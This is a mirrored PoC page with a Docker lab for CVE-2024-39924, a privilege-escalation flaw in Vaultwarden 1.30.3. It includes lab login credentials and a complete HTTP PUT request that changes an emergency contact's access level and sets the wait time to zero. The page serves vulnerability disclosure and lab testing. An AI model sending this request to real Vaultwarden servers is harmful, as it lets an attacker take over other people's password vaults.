Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-39924 PoC — Vaultwarden 安全漏洞

Source
https://github.com/l4rm4nd/PoC-CVE-2024-39924
Associated Vulnerability
Title:Vaultwarden 安全漏洞 (CVE-2024-39924)
Description:Vaultwarden是Daniel García个人开发者的一个用 Rust 编写的 Bitwarden 服务器 API 的替代实现。 Vaultwarden 1.30.3版本存在安全漏洞,该漏洞源于允许获得紧急访问权限的攻击者通过更改访问级别和修改等待时间来提升其权限。
Description
PoC for CVE-2024-39924
Readme
# PoC-CVE-2024-39924
PoC and lab setup for CVE-2024-39924

## Description

An issue was discovered in Vaultwarden (formerly Bitwarden_RS) 1.30.3. A vulnerability has been identified in the authentication and authorization process of the endpoint responsible for altering the metadata of an emergency access. It permits an attacker with granted emergency access to escalate their privileges by changing the access level and modifying the wait time. Consequently, the attacker can gain full control over the vault (when only intended to have read access) while bypassing the necessary wait period.

## Lab Setup

Just build the docker image and run it:

````
# download repo
git clone https://github.com/l4rm4nd/PoC-CVE-2024-39924 && cd PoC-CVE-2024-39924

# build docker image
docker build -t CVE-2024-39924 .

# run docker image
docker run --rm --name CVE-2024-39924 -p 443:80 CVE-2024-39924
````

Then browse https://127.0.0.1 and pwn.

## Credentials

Two user accounts were configured within Vaultwarden.

- Susan with the e-mail address `susan@wulport.com`
- Robert with the e-mail address `robert@wulport.com`

Susan was configured as emergency contact for Robert. Robert chose an approval time of 90 days, which Susan wants to bypass.

You can login as Susan with the following creds:

````
Username: susan@wulport.com
Password: Emission-darkened8-tr4itor
````

## Exploitation

https://www.mgm-sp.com/cve/missing-authentication-check-for-emergency-access

Issue a PUT request to the API endpoint `/api/emergency-access/<UUID>` and manipulate the JSON key `waitTimeDays` to the value `0`. After 1 minute, a cronjob will provide Susan access to Robert's vault.

>[!CAUTION]
> The cron interval was adjusted to make this PoC usable.
>
> The [default configuration](https://github.com/dani-garcia/vaultwarden/blob/51a1d641c5924779ac35fa69ae0eeb3369c1c6b7/.env.template#L160-L161) of Vaultwarden runs `EMERGENCY_REQUEST_TIMEOUT_SCHEDULE` hourly. So a real attacker would likely have to wait at least 1 hour to gain access to another person's vault.

<details>

````
PUT /api/emergency-access/127ed2a7-9225-499e-a6a7-70e96313a5db HTTP/1.1
Host: 127.0.0.1
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://127.0.0.1/
authorization: Bearer <redacted>
device-type: 10
Cache-Control: no-store
Pragma: no-cache
Bitwarden-Client-Name: web
Bitwarden-Client-Version: 2024.1.2
Connection: keep-alive
Cookie: <redacted>


{"email":"susan@wulport.com","type":0,"waitTimeDays":0,"Status":4}
````
</details>
File Snapshot

 [4.0K]  /data/pocs/2ab7bfeba81a88ccbfd68fd353cfc40819cb8b73
├── [ 576]  Dockerfile
├── [2.5K]  README.md
└── [4.0K]  src
    ├── [244K]  db.sqlite3
    ├── [ 32K]  db.sqlite3-shm
    ├── [225K]  db.sqlite3-wal
    ├── [4.0K]  icon_cache
    │   └── [5.3K]  facebook.com.png
    ├── [1.6K]  rsa_key.pem
    ├── [ 451]  rsa_key.pub.pem
    └── [4.0K]  ssl
        ├── [1.8K]  certs.pem
        └── [3.2K]  key.pem

3 directories, 10 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).
    3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.